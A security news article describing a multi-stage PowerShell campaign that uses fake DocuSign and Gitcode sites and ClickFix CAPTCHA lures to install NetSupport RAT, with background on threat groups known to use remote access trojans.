Multi-Stage PowerShell Attack Spreads NetSupport RAT

NetSupport RAT is a stealthy piece of malware that hackers use to take control of someone’s computer without their knowledge, remotely. It started as a legit remote access tool for IT support, but attackers have twisted it into something harmful. Hackers usually trick people into installing it through fake websites, phishing emails, or even fake software updates, sometimes asking them to run PowerShell commands themselves. Once it’s on the system, the hacker can see your screen, move your mouse, steal files, and run commands like they’re sitting right on your computer. It has been used in all kinds of scams, including fake DocuSign pages and Pokémon game downloads.

Several well-known hacker groups frequently employ Remote Access Trojans, or RATs, to infiltrate systems and remain undetected while stealing data or executing other malicious activities. FIN7 is one of the most active, using RATs to target businesses and steal credit card info, especially in the retail and hospitality sectors. APT33, which is believed to be linked to Iran, has used RATs to spy on companies in the energy and aerospace industries. APT41, tied to China, uses RATs for both spying and financial gain, often staying in networks for long periods. Another group, TA505, is known for spreading RATs like FlawedAmmyy to move around inside corporate systems. These groups rely on RATs not just to get in, but to control devices remotely and quietly carry out their goals over time.

A new malware campaign is using fake websites that look like Gitcode and DocuSign to trick users into running malicious PowerShell scripts, ultimately infecting their systems with NetSupport RAT. According to DomainTools, these sites lure victims, often through phishing emails or social media, into copying and running a PowerShell command in their Windows Run dialog. This command starts a chain reaction, downloading multiple scripts one after another until NetSupport RAT is installed. Some fake DocuSign sites even use a trick called ClickFix, where a CAPTCHA test fools users into copying a hidden command to their clipboard. When users paste and run it, thinking it's part of a verification step, the attack is triggered.

The attack uses multiple layers of scripts to avoid detection and make the investigation more difficult. One stage involves downloading a persistence file from GitHub, so the malware runs every time the system starts. While that file was unavailable at the time of analysis, researchers confirmed that the scripts communicate with fake DocuSign domains to retrieve and execute additional stages. The campaign shares similarities with past attacks like SocGholish, using familiar domain patterns and delivery methods. Although NetSupport Manager is a legitimate remote access tool, it has been misused by threat groups like FIN7, a financially motivated cybercriminal group known for targeting businesses with sophisticated phishing campaigns and malware to steal payment card data and gain remote access to networks, and Storm-0408, a threat group linked to malware distribution campaigns that use fake websites and social engineering tactics to deliver remote access tools like NetSupport RAT, to take full control of compromised machines.